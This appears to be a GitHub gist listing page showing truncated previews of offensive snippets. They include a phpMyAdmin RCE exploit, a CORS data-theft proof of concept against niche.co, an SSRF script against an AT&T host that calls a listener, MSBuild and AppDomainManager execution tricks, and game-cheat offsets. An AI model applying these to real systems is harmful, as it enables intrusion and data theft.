Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
95 followers · 12 following
View GitHub Profile
@andripwn
andripwn / .Applications.js
Last active July 19, 2019 15:07
// Future versions of Hyper may add additional config options,
// which will not automatically be merged into this file.
// See https://hyper.is#cfg for all currently supported options.
module.exports = {
config: {
pokemon: 'gengar', // Define your favorite pokemon theme
pokecursor: 'true', // Activate your theme's pokecursor
pokemonSyntax: 'dark', // Define the color of the terminal tabs
unibody: 'true', // Define the color of the Hyper window header
@andripwn
andripwn / Tasks.cs
Created July 25, 2019 20:56
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
@andripwn
andripwn / JankyAF.csproj
Created July 25, 2019 20:57
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@andripwn
andripwn / CompileInMemory.cs
Created July 25, 2019 20:58
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
{
class Program
@andripwn
andripwn / CORS.html
Last active August 15, 2019 08:30
<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from niche.co about user account
@andripwn
andripwn / Loads.js
Created August 15, 2019 20:26
--------------------------------------------------------------------------
---------------- Basic Variable -----------------------------
---------------- Do not edit ---------------------
--------------------------------------------------------------------------
local current_weapon = "none"
--------------------------------------------------------------------------
---------------- Basic Setting ------------------------------
--------------------------------------------------------------------------
@andripwn
andripwn / rce.py
Created September 14, 2019 09:36
phpMyadmin (RCE)
#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""
import requests
@andripwn
andripwn / filther.php
Created September 30, 2019 21:32
<?php
date_default_timezone_set('Asia/Jakarta');
error_reporting(0);
ini_set('memory_limit', '-1');
mkdir('result-email');
mkdir('result-sampah');
$f = file_get_contents($argv[1]);
$f = explode("\r\n", $f);
$counts = count($f);
@andripwn
andripwn / ssrf.py
Created October 12, 2019 11:48
import requests
url = "https://onlinefaxtwo.att.com/loa.php"
listener = input('Listener address. default port [80]: ')
headers = {'Content-type': 'application/x-www-form-urlencoded'}
data = {'uCompanyName': '<img src="http://' + listener + '">',
'uPersonAuth':'asas',
@andripwn
andripwn / byte-update.hpp
Created October 15, 2019 18:37
#pragma once
#include <cstdint>
// 2019-10-10 12:55:29.935863700 UTC
namespace hazedumper {
constexpr ::std::int64_t timestamp = 1570712129;
namespace netvars {
constexpr ::std::ptrdiff_t cs_gamerules_data = 0x0;
constexpr ::std::ptrdiff_t m_ArmorValue = 0xB340;